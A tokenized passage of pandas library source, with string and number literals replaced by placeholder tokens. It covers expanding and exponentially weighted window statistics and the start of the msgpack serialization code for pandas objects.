) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def apply ( self , func , args = ( ) , kwargs = { } ) : <EOL> return super ( Expanding , self ) . apply ( func , args = args , kwargs = kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def sum ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . sum ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def max ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . max ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def min ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . min ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def mean ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . mean ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def median ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . median ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def std ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Expanding , self ) . std ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def var ( self , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Expanding , self ) . var ( ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def skew ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . skew ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def kurt ( self , ** kwargs ) : <EOL> return super ( Expanding , self ) . kurt ( ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def quantile ( self , quantile , ** kwargs ) : <EOL> return super ( Expanding , self ) . quantile ( quantile = quantile , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def cov ( self , other = None , pairwise = None , ddof = <NUM_LIT:1> , ** kwargs ) : <EOL> return super ( Expanding , self ) . cov ( other = other , pairwise = pairwise , <EOL> ddof = ddof , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _shared_docs [ '<STR_LIT>' ] ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> return super ( Expanding , self ) . corr ( other = other , pairwise = pairwise , <EOL> ** kwargs ) <EOL> class ExpandingGroupby ( _GroupByMixin , Expanding ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Expanding <EOL> _bias_template = """<STR_LIT>""" <EOL> _pairwise_template = """<STR_LIT>""" <EOL> class EWM ( _Rolling ) : <EOL> r"""<STR_LIT>""" <EOL> _attributes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , obj , com = None , span = None , halflife = None , alpha = None , <EOL> min_periods = <NUM_LIT:0> , freq = None , adjust = True , ignore_na = False , <EOL> axis = <NUM_LIT:0> ) : <EOL> self . obj = obj <EOL> self . com = _get_center_of_mass ( com , span , halflife , alpha ) <EOL> self . min_periods = min_periods <EOL> self . freq = freq <EOL> self . adjust = adjust <EOL> self . ignore_na = ignore_na <EOL> self . axis = axis <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return EWM <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( SelectionMixin . _see_also_template ) <EOL> @ Appender ( SelectionMixin . _agg_doc ) <EOL> def aggregate ( self , arg , * args , ** kwargs ) : <EOL> return super ( EWM , self ) . aggregate ( arg , * args , ** kwargs ) <EOL> agg = aggregate <EOL> def _apply ( self , func , how = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> blocks , obj = self . _create_blocks ( how = how ) <EOL> results = [ ] <EOL> for b in blocks : <EOL> try : <EOL> values = self . _prep_values ( b . values ) <EOL> except TypeError : <EOL> results . append ( b . values . copy ( ) ) <EOL> continue <EOL> if values . size == <NUM_LIT:0> : <EOL> results . append ( values . copy ( ) ) <EOL> continue <EOL> if isinstance ( func , compat . string_types ) : <EOL> if not hasattr ( algos , func ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( func ) ) <EOL> cfunc = getattr ( algos , func ) <EOL> def func ( arg ) : <EOL> return cfunc ( arg , self . com , int ( self . adjust ) , <EOL> int ( self . ignore_na ) , int ( self . min_periods ) ) <EOL> results . append ( np . apply_along_axis ( func , self . axis , values ) ) <EOL> return self . _wrap_results ( results , blocks , obj ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> def mean ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . _apply ( '<STR_LIT>' , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _bias_template ) <EOL> def std ( self , bias = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _zsqrt ( self . var ( bias = bias , ** kwargs ) ) <EOL> vol = std <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _bias_template ) <EOL> def var ( self , bias = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> def f ( arg ) : <EOL> return algos . ewmcov ( arg , arg , self . com , int ( self . adjust ) , <EOL> int ( self . ignore_na ) , int ( self . min_periods ) , <EOL> int ( bias ) ) <EOL> return self . _apply ( f , ** kwargs ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _pairwise_template ) <EOL> def cov ( self , other = None , pairwise = None , bias = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> def _get_cov ( X , Y ) : <EOL> X = self . _shallow_copy ( X ) <EOL> Y = self . _shallow_copy ( Y ) <EOL> cov = algos . ewmcov ( X . _prep_values ( ) , Y . _prep_values ( ) , self . com , <EOL> int ( self . adjust ) , int ( self . ignore_na ) , <EOL> int ( self . min_periods ) , int ( bias ) ) <EOL> return X . _wrap_result ( cov ) <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_cov , pairwise = bool ( pairwise ) ) <EOL> @ Substitution ( name = '<STR_LIT>' ) <EOL> @ Appender ( _doc_template ) <EOL> @ Appender ( _pairwise_template ) <EOL> def corr ( self , other = None , pairwise = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if other is None : <EOL> other = self . _selected_obj <EOL> pairwise = True if pairwise is None else pairwise <EOL> other = self . _shallow_copy ( other ) <EOL> def _get_corr ( X , Y ) : <EOL> X = self . _shallow_copy ( X ) <EOL> Y = self . _shallow_copy ( Y ) <EOL> def _cov ( x , y ) : <EOL> return algos . ewmcov ( x , y , self . com , int ( self . adjust ) , <EOL> int ( self . ignore_na ) , int ( self . min_periods ) , <EOL> <NUM_LIT:1> ) <EOL> x_values = X . _prep_values ( ) <EOL> y_values = Y . _prep_values ( ) <EOL> cov = _cov ( x_values , y_values ) <EOL> x_var = _cov ( x_values , x_values ) <EOL> y_var = _cov ( y_values , y_values ) <EOL> corr = cov / _zsqrt ( x_var * y_var ) <EOL> return X . _wrap_result ( corr ) <EOL> return _flex_binary_moment ( self . _selected_obj , other . _selected_obj , <EOL> _get_corr , pairwise = bool ( pairwise ) ) <EOL> def _flex_binary_moment ( arg1 , arg2 , f , pairwise = False ) : <EOL> from pandas import Series , DataFrame , Panel <EOL> if not ( isinstance ( arg1 , ( np . ndarray , Series , DataFrame ) ) and <EOL> isinstance ( arg2 , ( np . ndarray , Series , DataFrame ) ) ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if ( isinstance ( arg1 , ( np . ndarray , Series ) ) and <EOL> isinstance ( arg2 , ( np . ndarray , Series ) ) ) : <EOL> X , Y = _prep_binary ( arg1 , arg2 ) <EOL> return f ( X , Y ) <EOL> elif isinstance ( arg1 , DataFrame ) : <EOL> def dataframe_from_int_dict ( data , frame_template ) : <EOL> result = DataFrame ( data , index = frame_template . index ) <EOL> if len ( result . columns ) > <NUM_LIT:0> : <EOL> result . columns = frame_template . columns [ result . columns ] <EOL> return result <EOL> results = { } <EOL> if isinstance ( arg2 , DataFrame ) : <EOL> if pairwise is False : <EOL> if arg1 is arg2 : <EOL> for i , col in enumerate ( arg1 . columns ) : <EOL> results [ i ] = f ( arg1 . iloc [ : , i ] , arg2 . iloc [ : , i ] ) <EOL> return dataframe_from_int_dict ( results , arg1 ) <EOL> else : <EOL> if not arg1 . columns . is_unique : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if not arg2 . columns . is_unique : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> X , Y = arg1 . align ( arg2 , join = '<STR_LIT>' ) <EOL> X = X + <NUM_LIT:0> * Y <EOL> Y = Y + <NUM_LIT:0> * X <EOL> res_columns = arg1 . columns . union ( arg2 . columns ) <EOL> for col in res_columns : <EOL> if col in X and col in Y : <EOL> results [ col ] = f ( X [ col ] , Y [ col ] ) <EOL> return DataFrame ( results , index = X . index , <EOL> columns = res_columns ) <EOL> elif pairwise is True : <EOL> results = defaultdict ( dict ) <EOL> for i , k1 in enumerate ( arg1 . columns ) : <EOL> for j , k2 in enumerate ( arg2 . columns ) : <EOL> if j < i and arg2 is arg1 : <EOL> results [ i ] [ j ] = results [ j ] [ i ] <EOL> else : <EOL> results [ i ] [ j ] = f ( * _prep_binary ( arg1 . iloc [ : , i ] , <EOL> arg2 . iloc [ : , j ] ) ) <EOL> p = Panel . from_dict ( results ) . swapaxes ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if len ( p . major_axis ) > <NUM_LIT:0> : <EOL> p . major_axis = arg1 . columns [ p . major_axis ] <EOL> if len ( p . minor_axis ) > <NUM_LIT:0> : <EOL> p . minor_axis = arg2 . columns [ p . minor_axis ] <EOL> return p <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> results = { } <EOL> for i , col in enumerate ( arg1 . columns ) : <EOL> results [ i ] = f ( * _prep_binary ( arg1 . iloc [ : , i ] , arg2 ) ) <EOL> return dataframe_from_int_dict ( results , arg1 ) <EOL> else : <EOL> return _flex_binary_moment ( arg2 , arg1 , f ) <EOL> def _get_center_of_mass ( com , span , halflife , alpha ) : <EOL> valid_count = len ( [ x for x in [ com , span , halflife , alpha ] <EOL> if x is not None ] ) <EOL> if valid_count > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if com is not None : <EOL> if com < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif span is not None : <EOL> if span < <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> com = ( span - <NUM_LIT:1> ) / <NUM_LIT> <EOL> elif halflife is not None : <EOL> if halflife <= <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> decay = <NUM_LIT:1> - np . exp ( np . log ( <NUM_LIT:0.5> ) / halflife ) <EOL> com = <NUM_LIT:1> / decay - <NUM_LIT:1> <EOL> elif alpha is not None : <EOL> if alpha <= <NUM_LIT:0> or alpha > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> com = ( <NUM_LIT:1.0> - alpha ) / alpha <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return float ( com ) <EOL> def _offset ( window , center ) : <EOL> if not com . is_integer ( window ) : <EOL> window = len ( window ) <EOL> offset = ( window - <NUM_LIT:1> ) / <NUM_LIT> if center else <NUM_LIT:0> <EOL> try : <EOL> return int ( offset ) <EOL> except : <EOL> return offset . astype ( int ) <EOL> def _require_min_periods ( p ) : <EOL> def _check_func ( minp , window ) : <EOL> if minp is None : <EOL> return window <EOL> else : <EOL> return max ( p , minp ) <EOL> return _check_func <EOL> def _use_window ( minp , window ) : <EOL> if minp is None : <EOL> return window <EOL> else : <EOL> return minp <EOL> def _zsqrt ( x ) : <EOL> result = np . sqrt ( x ) <EOL> mask = x < <NUM_LIT:0> <EOL> from pandas import DataFrame <EOL> if isinstance ( x , DataFrame ) : <EOL> if mask . values . any ( ) : <EOL> result [ mask ] = <NUM_LIT:0> <EOL> else : <EOL> if mask . any ( ) : <EOL> result [ mask ] = <NUM_LIT:0> <EOL> return result <EOL> def _prep_binary ( arg1 , arg2 ) : <EOL> if not isinstance ( arg2 , type ( arg1 ) ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> X = arg1 + <NUM_LIT:0> * arg2 <EOL> Y = arg2 + <NUM_LIT:0> * arg1 <EOL> return X , Y <EOL> def rolling ( obj , win_type = None , ** kwds ) : <EOL> from pandas import Series , DataFrame <EOL> if not isinstance ( obj , ( Series , DataFrame ) ) : <EOL> raise TypeError ( '<STR_LIT>' % type ( obj ) ) <EOL> if win_type is not None : <EOL> return Window ( obj , win_type = win_type , ** kwds ) <EOL> return Rolling ( obj , ** kwds ) <EOL> rolling . __doc__ = Window . __doc__ <EOL> def expanding ( obj , ** kwds ) : <EOL> from pandas import Series , DataFrame <EOL> if not isinstance ( obj , ( Series , DataFrame ) ) : <EOL> raise TypeError ( '<STR_LIT>' % type ( obj ) ) <EOL> return Expanding ( obj , ** kwds ) <EOL> expanding . __doc__ = Expanding . __doc__ <EOL> def ewm ( obj , ** kwds ) : <EOL> from pandas import Series , DataFrame <EOL> if not isinstance ( obj , ( Series , DataFrame ) ) : <EOL> raise TypeError ( '<STR_LIT>' % type ( obj ) ) <EOL> return EWM ( obj , ** kwds ) <EOL> ewm . __doc__ = EWM . __doc__ </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime , date , timedelta <EOL> from dateutil . parser import parse <EOL> import os <EOL> from textwrap import dedent <EOL> import warnings <EOL> import numpy as np <EOL> from pandas import compat <EOL> from pandas . compat import u , u_safe <EOL> from pandas import ( Timestamp , Period , Series , DataFrame , <EOL> Index , MultiIndex , Float64Index , Int64Index , <EOL> Panel , RangeIndex , PeriodIndex , DatetimeIndex , NaT , <EOL> Categorical ) <EOL> from pandas . tslib import NaTType <EOL> from pandas . sparse . api import SparseSeries , SparseDataFrame , SparsePanel <EOL> from pandas . sparse . array import BlockIndex , IntIndex <EOL> from pandas . core . generic import NDFrame <EOL> from pandas . core . common import ( PerformanceWarning , <EOL> is_categorical_dtype , is_object_dtype , <EOL> needs_i8_conversion , pandas_dtype ) <EOL> from pandas . io . common import get_filepath_or_buffer <EOL> from pandas . core . internals import BlockManager , make_block <EOL> import pandas . core . internals as internals <EOL> from pandas . msgpack import Unpacker as _Unpacker , Packer as _Packer , ExtType <EOL> from pandas . util . _move import ( <EOL> BadMove as _BadMove , <EOL> move_into_mutable_buffer as _move_into_mutable_buffer , <EOL> ) <EOL> try : <EOL> import zlib <EOL> def _check_zlib ( ) : <EOL> pass <EOL> except ImportError : <EOL> def _check_zlib ( ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> _check_zlib . __doc__ = dedent ( <EOL> """<STR_LIT>""" , <EOL> ) <EOL> try : <EOL> import blosc <EOL> def _check_blosc ( ) : <EOL> pass <EOL> except ImportError : <EOL> def _check_blosc ( ) : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> _check_blosc . __doc__ = dedent ( <EOL> """<STR_LIT>""" , <EOL> ) <EOL> compressor = None <EOL> def to_msgpack ( path_or_buf , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> global compressor <EOL> compressor = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if compressor : <EOL> compressor = u ( compressor ) <EOL> append = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if append : <EOL> mode = '<STR_LIT>' <EOL> else : <EOL> mode = '<STR_LIT:wb>' <EOL> def writer ( fh ) : <EOL> for a in args : <EOL> fh . write ( pack ( a , ** kwargs ) ) <EOL> if isinstance ( path_or_buf , compat . string_types ) : <EOL> with open ( path_or_buf , mode ) as fh : <EOL> writer ( fh ) <EOL> elif path_or_buf is None : <EOL> buf = compat . BytesIO ( ) <EOL> writer ( buf ) <EOL> return buf . getvalue ( ) <EOL> else : <EOL> writer ( path_or_buf ) <EOL> def read_msgpack ( path_or_buf , encoding = '<STR_LIT:utf-8>' , iterator = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> path_or_buf , _ , _ = get_filepath_or_buffer ( path_or_buf ) <EOL> if iterator : <EOL> return Iterator ( path_or_buf ) <EOL> def read ( fh ) : <EOL> l = list ( unpack ( fh , encoding = encoding , ** kwargs ) ) <EOL> if len ( l ) == <NUM_LIT:1> : <EOL> return l [ <NUM_LIT:0> ] <EOL> return l <EOL> if isinstance ( path_or_buf , compat . string_types ) : <EOL> try : <EOL> exists = os . path . exists ( path_or_buf ) <EOL> except ( TypeError , ValueError ) : <EOL> exists = False <EOL> if exists : <EOL> with open ( path_or_buf , '<STR_LIT:rb>' ) as fh : <EOL> return read ( fh ) <EOL> if isinstance ( path_or_buf , compat . binary_type ) : <EOL> fh = None <EOL> try : <EOL> fh = compat . BytesIO ( path_or_buf ) <EOL> return read ( fh ) <EOL> finally : <EOL> if fh is not None : <EOL> fh . close ( ) <EOL> if hasattr ( path_or_buf , '<STR_LIT>' ) and compat . callable ( path_or_buf . read ) : <EOL> return read ( path_or_buf ) <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> dtype_dict = { <NUM_LIT> : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> <NUM_LIT> : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> u ( '<STR_LIT>' ) : np . dtype ( '<STR_LIT>' ) , <EOL> <NUM_LIT:7> : np . dtype ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def dtype_for ( t ) : <EOL> """<STR_LIT>""" <EOL> if t in dtype_dict : <EOL> return dtype_dict [ t ] <EOL> return np . typeDict . get ( t , t ) <EOL> c2f_dict = { '<STR_LIT>' : np . float64 , <EOL> '<STR_LIT>' : np . float64 , <EOL> '<STR_LIT>' : np . float32 } <EOL> if hasattr ( np , '<STR_LIT>' ) : <EOL> c2f_dict [ '<STR_LIT>' ] = np . float128 <EOL> def c2f ( r , i , ctype_name ) : <EOL> """<STR_LIT>""" <EOL> ftype = c2f_dict [ ctype_name ] <EOL> return np . typeDict [ ctype_name ] ( ftype ( r ) + <NUM_LIT> * ftype ( i ) ) <EOL> def convert ( values ) : <EOL> """<STR_LIT>""" <EOL> dtype = values . dtype <EOL> if is_categorical_dtype ( values ) : <EOL> return values <EOL> elif is_object_dtype ( dtype ) : <EOL> return values . ravel ( ) . tolist ( ) <EOL> if needs_i8_conversion ( dtype ) : <EOL> values = values . view ( '<STR_LIT>' ) <EOL> v = values . ravel ( ) <EOL> if compressor == '<STR_LIT>' : <EOL> _check_zlib ( ) <EOL> if dtype == np . object_ : <EOL> return v . tolist ( ) <EOL> v = v . tostring ( ) <EOL> return ExtType ( <NUM_LIT:0> , zlib . compress ( v ) ) <EOL> elif compressor == '<STR_LIT>' : <EOL> _check_blosc ( ) <EOL> if dtype == np . object_ : <EOL> return v . tolist ( ) <EOL> v = v . tostring ( ) <EOL> return ExtType ( <NUM_LIT:0> , blosc . compress ( v , typesize = dtype . itemsize ) ) <EOL> return ExtType ( <NUM_LIT:0> , v . tostring ( ) ) <EOL> def unconvert ( values , dtype , compress = None ) : <EOL> as_is_ext = isinstance ( values , ExtType ) and values . code == <NUM_LIT:0> <EOL> if as_is_ext : <EOL> values = values . data <EOL> if is_categorical_dtype ( dtype ) : <EOL> return values <EOL> elif is_object_dtype ( dtype ) : <EOL> return np . array ( values , dtype = object ) <EOL> dtype = pandas_dtype ( dtype ) . base <EOL> if not as_is_ext : <EOL> values = values . encode ( '<STR_LIT>' ) <EOL> if compress : <EOL> if compress == u'<STR_LIT>' : <EOL> _check_zlib ( ) <EOL> decompress = zlib . decompress <EOL> elif compress == u'<STR_LIT>' : <EOL> _check_blosc ( ) <EOL> decompress = blosc . decompress <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> try : <EOL> return np . frombuffer ( <EOL> _move_into_mutable_buffer ( decompress ( values ) ) , <EOL> dtype = dtype , <EOL> ) <EOL> except _BadMove as e : <EOL> values = e . args [ <NUM_LIT:0> ] <EOL> if len ( values ) > <NUM_LIT:1> : <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> PerformanceWarning , <EOL> ) <EOL> return np . fromstring ( values , dtype = dtype ) <EOL> def encode ( obj ) : <EOL> """<STR_LIT>""" <EOL> tobj = type ( obj ) <EOL> if isinstance ( obj , Index ) : <EOL> if isinstance ( obj , RangeIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT:start>' : getattr ( obj , '<STR_LIT>' , None ) , <EOL> u'<STR_LIT>' : getattr ( obj , '<STR_LIT>' , None ) , <EOL> u'<STR_LIT>' : getattr ( obj , '<STR_LIT>' , None ) } <EOL> elif isinstance ( obj , PeriodIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : u_safe ( getattr ( obj , '<STR_LIT>' , None ) ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . asi8 ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , DatetimeIndex ) : <EOL> tz = getattr ( obj , '<STR_LIT>' , None ) <EOL> if tz is not None : <EOL> tz = u ( tz . zone ) <EOL> obj = obj . tz_convert ( '<STR_LIT>' ) <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . asi8 ) , <EOL> u'<STR_LIT>' : u_safe ( getattr ( obj , '<STR_LIT>' , None ) ) , <EOL> u'<STR_LIT>' : tz , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , MultiIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : getattr ( obj , '<STR_LIT>' , None ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . values ) , <EOL> u'<STR_LIT>' : compressor } <EOL> else : <EOL> return { u'<STR_LIT>' : u'<STR_LIT:index>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . values ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , Categorical ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT>' : obj . codes , <EOL> u'<STR_LIT>' : obj . categories , <EOL> u'<STR_LIT>' : obj . ordered , <EOL> u'<STR_LIT>' : compressor } <EOL> elif isinstance ( obj , Series ) : <EOL> if isinstance ( obj , SparseSeries ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> else : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT:name>' : getattr ( obj , '<STR_LIT:name>' , None ) , <EOL> u'<STR_LIT:index>' : obj . index , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj . values ) , <EOL> u'<STR_LIT>' : compressor } <EOL> elif issubclass ( tobj , NDFrame ) : <EOL> if isinstance ( obj , SparseDataFrame ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> elif isinstance ( obj , SparsePanel ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' <EOL> ) <EOL> else : <EOL> data = obj . _data <EOL> if not data . is_consolidated ( ) : <EOL> data = data . consolidate ( ) <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : data . axes , <EOL> u'<STR_LIT>' : [ { u'<STR_LIT>' : b . mgr_locs . as_array , <EOL> u'<STR_LIT>' : convert ( b . values ) , <EOL> u'<STR_LIT>' : b . values . shape , <EOL> u'<STR_LIT>' : u ( b . dtype . name ) , <EOL> u'<STR_LIT>' : u ( b . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : compressor } for b in data . blocks ] <EOL> } <EOL> elif isinstance ( obj , ( datetime , date , np . datetime64 , timedelta , <EOL> np . timedelta64 , NaTType ) ) : <EOL> if isinstance ( obj , Timestamp ) : <EOL> tz = obj . tzinfo <EOL> if tz is not None : <EOL> tz = u ( tz . zone ) <EOL> offset = obj . offset <EOL> if offset is not None : <EOL> offset = u ( offset . freqstr ) <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:value>' : obj . value , <EOL> u'<STR_LIT>' : offset , <EOL> u'<STR_LIT>' : tz } <EOL> if isinstance ( obj , NaTType ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' } <EOL> elif isinstance ( obj , np . timedelta64 ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : obj . view ( '<STR_LIT>' ) } <EOL> elif isinstance ( obj , timedelta ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : ( obj . days , obj . seconds , obj . microseconds ) } <EOL> elif isinstance ( obj , np . datetime64 ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : u ( str ( obj ) ) } <EOL> elif isinstance ( obj , datetime ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:data>' : u ( obj . isoformat ( ) ) } <EOL> elif isinstance ( obj , date ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT:date>' , <EOL> u'<STR_LIT:data>' : u ( obj . isoformat ( ) ) } <EOL> raise Exception ( "<STR_LIT>" % obj ) <EOL> elif isinstance ( obj , Period ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : obj . ordinal , <EOL> u'<STR_LIT>' : u ( obj . freq ) } <EOL> elif isinstance ( obj , BlockIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : obj . blocs , <EOL> u'<STR_LIT>' : obj . blengths , <EOL> u'<STR_LIT>' : obj . length } <EOL> elif isinstance ( obj , IntIndex ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : u ( obj . __class__ . __name__ ) , <EOL> u'<STR_LIT>' : obj . indices , <EOL> u'<STR_LIT>' : obj . length } <EOL> elif isinstance ( obj , np . ndarray ) : <EOL> return { u'<STR_LIT>' : u'<STR_LIT>' , <EOL> u'<STR_LIT>' : obj . shape , <EOL> u'<STR_LIT>' : obj . ndim , <EOL> u'<STR_LIT>' : u ( obj . dtype . name ) , <EOL> u'<STR_LIT:data>' : convert ( obj ) , 